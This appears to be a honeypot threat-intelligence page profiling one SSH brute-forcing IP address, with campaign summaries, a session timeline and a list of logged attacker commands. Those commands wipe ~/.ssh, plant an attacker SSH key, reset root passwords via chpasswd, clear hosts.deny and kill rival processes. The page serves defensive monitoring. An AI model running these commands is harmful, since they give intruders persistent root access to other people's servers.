← Back to feed

157.173.122.136

TAGGED SUSPICIOUS how we decide →
Threat Confidence
59%
Location
🇫🇷 FR / Lauterbourg
ASN
AS51167 · Contabo GmbH
Cloud Provider
Total Events
606
Top 10% by volume
Agent Count
2
First / Last Seen
2026-07-21 02:37 — 2026-07-22 02:21
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Defense Evasion
Credential Access
Discovery
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Multi-Agent Scan SCAN Active medium
24 IPs 14563 events
2026-06-25 — ongoing · 24 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
51 IPs 99161 events
2026-06-09 — ongoing · 51 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
50 IPs 60458 events
2026-04-29 — ongoing · 50 IPs independently targeted the same honeypot sensors within a 24-hour window. Hosted on Vultr. Scanning the same …
Multi-Agent Scan SCAN Active medium
43 IPs 119688 events
2026-03-30 — ongoing · 43 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
14 IPs 853 events
2026-03-03 — ongoing · 14 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
20 IPs 14045 events
2026-03-03 — ongoing · 20 IPs independently targeted the same honeypot sensors within a 24-hour window. Hosted on Vultr. Scanning the same …
Multi-Agent Scan SCAN Active medium
37 IPs 72180 events
2026-03-03 — ongoing · 37 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
94 IPs 131477 events
2026-03-03 — ongoing · 94 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
40 IPs 18034 events
2026-03-03 — ongoing · 40 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
25 IPs 20461 events
2026-03-03 — ongoing · 25 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
34 IPs 42191 events
2026-03-03 — ongoing · 34 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
HASSH f555226df196… — SSH-2.0-libssh_0.9.6 (552 IPs, 66 countries) HASSH Active high 🇺🇸 US
552 IPs 456133 events
ftp:bruteforcehttp:scanssh:bruteforce
2026-02-25 — ongoing · 552 IPs are running an identical SSH client (HASSH fingerprint f555226df196…). Top network: DigitalOcean, LLC (AS14061). Geographic and …
Multi-Agent Scan SCAN Active medium
4 IPs 9871 events
2026-02-24 — ongoing · 4 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
74 IPs 103276 events
2026-02-24 — ongoing · 74 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
61 IPs 102167 events
2026-02-23 — ongoing · 61 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
5 IPs 1814 events
2026-02-22 — ongoing · 5 IPs independently targeted the same honeypot sensors within a 24-hour window. Hosted on DO. Scanning the same …
AS51167 Contabo GmbH ASN Active medium 🇫🇷 FR
8 IPs 3397 events
ftp:bruteforcemysql:bruteforcessh:bruteforce
2026-02-18 — ongoing · 8 IPs from the same network (Contabo GmbH, AS51167) were active during overlapping time periods. Temporal correlation across …
Session Forensics
malware_dropper ×12 credential_probe ×33 opportunistic_bruter ×7
Sessions
52 (19 with login)
Avg Depth Score
0.42
Commands Executed
121
Files Downloaded
17
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
  • cat /proc/cpuinfo | grep name | wc -l
  • echo "root:rt47U1N2iHWN"|chpasswd|bash
  • rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
  • cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
  • free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
  • ls -lh $(which ls)
  • which ls
  • echo "root:Eyx4uQREJUTV"|chpasswd|bash
  • echo "root:acixpdIvySer"|chpasswd|bash
  • echo "root:vvRrzXmDZVjJ"|chpasswd|bash
  • echo "root:9VVNbGky7LzO"|chpasswd|bash
Fingerprints
SSH-2.0-libssh_0.9.6
Evidence Timeline
Malware Dropper a056a9181368 newark_01 · 2026-07-22 02:20
3 1 1 100%
Loading events...
Opportunistic Bruter 675464e5b192 newark_01 · 2026-07-22 02:21
1 50%
Loading events...
Credential Probe f06e75a4e0cf newark_01 · 2026-07-22 02:20
1 20%
Loading events...
Credential Probe d5c5ec51c593 newark_01 · 2026-07-22 02:11
1 20%
Loading events...
Credential Probe 3aa47f66e671 newark_01 · 2026-07-22 02:05
1 20%
Loading events...
Malware Dropper f747f610ffa3 newark_01 · 2026-07-22 01:59
20 2 1 100%
Loading events...
Credential Probe d4fc92546643 newark_01 · 2026-07-22 01:59
1 20%
Loading events...
Opportunistic Bruter 86d8a1b52f41 newark_01 · 2026-07-22 01:56
1 50%
Loading events...
Malware Dropper d1d2da72ba3c newark_01 · 2026-07-22 01:56
3 1 1 100%
Loading events...
Credential Probe eb7f5ee113c3 newark_01 · 2026-07-22 01:56
1 20%
Loading events...
Credential Probe 5333a5e46b10 newark_01 · 2026-07-22 01:53
1 20%
Loading events...
Credential Probe 9f7bc7c35fad newark_01 · 2026-07-22 01:50
1 20%
Loading events...
Malware Dropper e88eb251f6b2 newark_01 · 2026-07-22 01:44
3 1 1 100%
Loading events...
Opportunistic Bruter 0b6579af6114 newark_01 · 2026-07-22 01:44
1 50%
Loading events...
Credential Probe 82447c8cb497 newark_01 · 2026-07-22 01:44
1 20%
Loading events...
Credential Probe f307173d01b3 newark_01 · 2026-07-22 01:37
1 20%
Loading events...
Credential Probe 15e3dc84c102 newark_01 · 2026-07-22 01:34
1 20%
Loading events...
Credential Probe f3bd7013ce10 newark_01 · 2026-07-22 01:31
1 20%
Loading events...
Malware Dropper a9733740774d newark_01 · 2026-07-22 01:25
20 2 1 100%
Loading events...
Credential Probe dcbd7aa50aac newark_01 · 2026-07-22 01:25
1 20%
Loading events...
Opportunistic Bruter b54bae50634e newark_01 · 2026-07-22 01:22
1 50%
Loading events...
Malware Dropper dd1763085650 newark_01 · 2026-07-22 01:22
3 1 1 100%
Loading events...
Credential Probe c8a67c2c3cd3 newark_01 · 2026-07-22 01:22
1 20%
Loading events...
Malware Dropper ab5e71ac1274 newark_01 · 2026-07-22 01:19
20 2 1 100%
Loading events...
Credential Probe e482d43d0cbb newark_01 · 2026-07-22 01:19
1 20%
Loading events...
Opportunistic Bruter 1e405ba90eb2 newark_01 · 2026-07-22 01:16
1 50%
Loading events...
Malware Dropper 2311aa78d3ce newark_01 · 2026-07-22 01:16
3 1 1 100%
Loading events...
Credential Probe d12a1c16b025 newark_01 · 2026-07-22 01:16
1 20%
Loading events...
Credential Probe 1ad8a2d4b3ba newark_01 · 2026-07-22 01:13
1 20%
Loading events...
Credential Probe 8e3c4502d280 newark_01 · 2026-07-22 01:10
1 20%
Loading events...
Credential Probe 947e1a61e3da newark_01 · 2026-07-22 01:07
1 20%
Loading events...
Credential Probe a1bbd465ed33 newark_01 · 2026-07-22 01:00
1 20%
Loading events...
Credential Probe c261df4b181f newark_01 · 2026-07-22 00:54
1 20%
Loading events...
Credential Probe 27859ce9a6cd newark_01 · 2026-07-22 00:48
1 20%
Loading events...
Credential Probe 2c7b175ade09 newark_01 · 2026-07-22 00:45
1 20%
Loading events...
Malware Dropper fbd1d38502cc newark_01 · 2026-07-22 00:39
20 2 1 100%
Loading events...
Credential Probe f409be3118c2 newark_01 · 2026-07-22 00:39
1 20%
Loading events...
Credential Probe a0da5b355c90 newark_01 · 2026-07-22 00:36
1 20%
Loading events...
Credential Probe 8b57b2fa5a1e newark_01 · 2026-07-22 00:33
1 20%
Loading events...
Credential Probe 5f67841e1012 newark_01 · 2026-07-22 00:29
1 20%
Loading events...
Malware Dropper 76e8df2e3e21 newark_01 · 2026-07-22 00:23
20 2 1 100%
Loading events...
Credential Probe 5645f20a0522 newark_01 · 2026-07-22 00:20
1 20%
Loading events...
Credential Probe 49299c5d96b7 newark_01 · 2026-07-22 00:17
1 20%
Loading events...
Credential Probe 0101c46784ae newark_01 · 2026-07-22 00:11
1 20%
Loading events...
Credential Probe b64e4ab2a202 newark_01 · 2026-07-22 00:08
1 20%
Loading events...
Credential Probe 066c1a61f7b7 newark_01 · 2026-07-22 00:05
1 20%
Loading events...
Opportunistic Bruter 5550b6be6f49 newark_01 · 2026-07-22 00:02
1 50%
Loading events...
Malware Dropper 792a960ceadb newark_01 · 2026-07-22 00:01
3 1 1 100%
Loading events...
Credential Probe 2b1ca2172fa7 newark_01 · 2026-07-22 00:02
1 20%
Loading events...
Malware Dropper 84eecc42227e w4m_singapore_01 · 2026-07-21 02:37
3 1 1 100%
Loading events...
{# Cloudflare Web Analytics — cookieless, public pages only. The context processor withholds the token from authenticated requests. #}